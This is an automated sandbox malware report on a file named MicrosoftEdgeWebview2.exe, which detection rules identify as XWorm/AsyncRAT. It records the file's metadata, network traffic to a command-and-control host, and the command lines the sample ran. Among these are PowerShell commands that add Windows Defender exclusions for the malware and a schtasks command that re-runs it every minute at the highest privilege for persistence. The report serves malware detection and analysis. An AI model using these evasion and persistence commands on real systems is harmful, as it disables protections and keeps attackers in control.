            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3bsye50.i2l.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubuc4jkz.nxp.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1gftxz3.umf.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlt3hmss.vpl.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuvqzeoe.vq0.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvar1kmp.cjy.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zeryj23e.2te.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnk

            Download File
            Process:C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 30 04:18:50 2024, mtime=Fri Aug 30 04:18:50 2024, atime=Fri Aug 30 04:18:50 2024, length=64000, window=hide
            Category:dropped
            Size (bytes):1124
            Entropy (8bit):5.0312295532362805
            Encrypted:false
            SSDEEP:24:82bCK3CEldGTl2RTgK7vzFA8fdZ6bbOzw73vqyFm:82bCK3CMS2RPzuIdZ6bbOzwWyF
            MD5:A2656B1015970A602164455E406EEF62
            SHA1:CE47BBF3B0C051B589D39F6D75DA5F22EC9EFD31
            SHA-256:773BA63D5A6212640F3F31A447881C7B1A6C83A4AA7530E133E1FF2F0904E812
            SHA-512:1646526B6A4E87F9F2B89C364D718C35EF93116F71F04B115FCA2D407D0BE2A4BBA5505AB792AEA2D69ED90EBE195AE365C5308E51FA18EB0DA9EB4A33BB3B40
            Malicious:false
            Preview:L..................F.... ...-.......-.......-.................................:..DG..Yr?.D..U..k0.&...&......vk.v...... .....CZ..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y;*...........................%..A.p.p.D.a.t.a...B.P.1......Y9*..Local.<......CW.^.Y;*....b.........................L.o.c.a.l.....N.1......YP*..Temp..:......CW.^.YP*....l.....................O...T.e.m.p.......2......YZ* .MICROS~1.EXE..d.......YZ*.YZ*...........................B$.M.i.c.r.o.s.o.f.t.E.d.g.e.W.e.b.v.i.e.w.2...e.x.e.......j...............-.......i.............m.....C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe..6.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.M.i.c.r.o.s.o.f.t.E.d.g.e.W.e.b.v.i.e.w.2...e.x.e.............:...........|....I.J.H..K..:...`.......X.......888683...........hT..CrF.f4... .D.T..b...,.......hT..CrF.f4... .D.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):6.755835099911209
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            • Win32 Executable (generic) a (10002005/4) 49.75%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Windows Screen Saver (13104/52) 0.07%
            • Generic Win/DOS Executable (2004/3) 0.01%
            File name:MicrosoftEdgeWebview2.exe
            File size:64'000 bytes
            MD5:51a89f27afe7c3b57d5cdad473178934
            SHA1:f945eba7f25f15d231f962143b8f0381270709fb
            SHA256:e36aa73b955f2e30b2377dd33c6b55c798f7334ace728b0ad19187965cbe8196
            SHA512:2dde54dd4f3a691f30b8b5fc45d91268d8fc0931852737fb3ab3605abc97e44cf6421870809d4c72316ac917e61b2858bfc4340ef505aa9395e3c20cf80cb563
            SSDEEP:1536:9STRUN9+EwCuuJfBFv9/O6OOwUOJSnjEF3b:9cM7Fv9/uOwDSQ3b
            TLSH:B853AD8437948226E9EE7BF95273A54B1B30B6035813C78D4CE8C6CB1B67BD48E427D6
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................b......N.... ........@.. .......................@............@................................

            File Icon

            Icon Hash:df6279fe3f0d0606

            Static PE Info

            General

            Entrypoint:0x40b44e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x66CB0417 [Sun Aug 25 10:14:47 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xb3f80x53.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x5fb0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x120000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000x94540x9600a38e2b7e96c2d02af8971d8a76da4076False0.4872135416666667data5.677666315349684IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rsrc0xc0000x5fb00x60004f371098be6b4da3c47fb336edd45070False0.9289143880208334data7.791206677674762IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x120000xc0x200e1d653c1eeaa7cbebda58b1e22380eacFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0xc1300x5a04PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9580367991668113
            RT_GROUP_ICON0x11b340x14data0.9
            RT_VERSION0x11b480x27cdata0.4606918238993711
            RT_MANIFEST0x11dc40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Network Behavior

            Suricata IDS Alerts

            TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
            2024-08-30T07:19:29.560654+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound14973815883192.168.2.4147.185.221.20

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 30, 2024 07:18:55.516511917 CEST4973715883192.168.2.4147.185.221.20
            Aug 30, 2024 07:18:55.521333933 CEST1588349737147.185.221.20192.168.2.4
            Aug 30, 2024 07:18:55.521459103 CEST4973715883192.168.2.4147.185.221.20
            Aug 30, 2024 07:18:55.730798960 CEST4973715883192.168.2.4147.185.221.20
            Aug 30, 2024 07:18:55.735830069 CEST1588349737147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:09.375549078 CEST4973715883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:09.380788088 CEST1588349737147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:16.896280050 CEST1588349737147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:16.896406889 CEST4973715883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:19.107557058 CEST4973715883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:19.112257957 CEST4973815883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:19.112472057 CEST1588349737147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:19.117044926 CEST1588349738147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:19.117110014 CEST4973815883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:19.157509089 CEST4973815883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:19.162471056 CEST1588349738147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:29.560653925 CEST4973815883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:29.565642118 CEST1588349738147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:39.966727018 CEST4973815883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:39.971720934 CEST1588349738147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:40.493653059 CEST1588349738147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:40.493737936 CEST4973815883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:40.669699907 CEST4973815883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:40.670891047 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:40.674616098 CEST1588349738147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:40.675692081 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:40.675767899 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:40.788808107 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:40.794116020 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:54.842037916 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:54.846987963 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:57.404102087 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:57.408987999 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:59.153973103 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:59.159423113 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:19:59.279125929 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:19:59.283907890 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:20:00.138463020 CEST4973915883192.168.2.4147.185.221.20
            Aug 30, 2024 07:20:00.143558025 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:20:02.038105011 CEST1588349739147.185.221.20192.168.2.4
            Aug 30, 2024 07:20:02.038161993 CEST4973915883192.168.2.4147.185.221.20

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 30, 2024 07:18:55.496432066 CEST5020353192.168.2.41.1.1.1
            Aug 30, 2024 07:18:55.509171009 CEST53502031.1.1.1192.168.2.4

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Aug 30, 2024 07:18:55.496432066 CEST192.168.2.41.1.1.10xace2Standard query (0)on-weighted.gl.at.ply.ggA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Aug 30, 2024 07:18:55.509171009 CEST1.1.1.1192.168.2.40xace2No error (0)on-weighted.gl.at.ply.gg147.185.221.20A (IP address)IN (0x0001)false

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:01:17:55
            Start date:30/08/2024
            Path:C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe"
            Imagebase:0x8e0000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
            Reputation:low
            Has exited:false

            General

            Target ID:1
            Start time:01:17:58
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:2
            Start time:01:17:58
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:4
            Start time:01:18:05
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:5
            Start time:01:18:05
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:7
            Start time:01:18:15
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:8
            Start time:01:18:15
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:11
            Start time:01:18:29
            Start date:30/08/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:12
            Start time:01:18:29
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:13
            Start time:01:18:50
            Start date:30/08/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:14
            Start time:01:18:50
            Start date:30/08/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:15
            Start time:01:18:51
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Imagebase:0xa80000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: Joe Security
            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, Author: ditekSHen
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 82%, ReversingLabs
            • Detection: 69%, Virustotal, Browse
            Reputation:low
            Has exited:true

            General

            Target ID:16
            Start time:01:18:59
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Imagebase:0x5e0000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:17
            Start time:01:19:01
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Imagebase:0xd00000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:18
            Start time:01:19:07
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Imagebase:0x680000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:20
            Start time:01:20:00
            Start date:30/08/2024
            Path:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Wow64 process (32bit):false
            Commandline:C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Imagebase:0x7c0000
            File size:64'000 bytes
            MD5 hash:51A89F27AFE7C3B57D5CDAD473178934
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:false

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:21.9%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:6
              Total number of Limit Nodes:0
